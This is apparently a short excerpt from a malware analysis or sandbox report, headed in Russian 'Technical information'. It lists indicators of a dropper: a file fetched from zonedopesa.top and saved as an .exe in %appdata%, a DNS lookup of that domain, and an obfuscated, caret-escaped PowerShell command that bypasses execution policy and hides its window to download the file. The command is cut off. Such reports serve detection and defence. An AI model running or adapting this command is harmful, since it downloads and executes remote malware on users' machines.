Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^werSH^e^lL^.^Exe^ -^EXE^Cu^t^i^OnPOLIcy bypA^SS^ -n^OpR^of^IL^E -WiNdOWST^Y^Le^ hiDdeN ^(n^EW-Object^ S^YSTem^.^nE^T.WEB^cl^ie^NT)^.dowNLOA^dfI^lE('http://www.zonedopesa.top/rea...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "PO^werSH^e^lL^.^Exe^ -^EXE^Cu^t^i^OnPOLIcy bypA^SS^ -n^OpR^of^IL^E -WiNdOWST^Y^Le^ hiDdeN ^(n^EW-Object^ S^YSTem^.^nE^T.WEB^cl^ie^NT)^.dowNLOA^dfI^lE('http://www.zonedopesa.top/rea...' (со скрытым окном)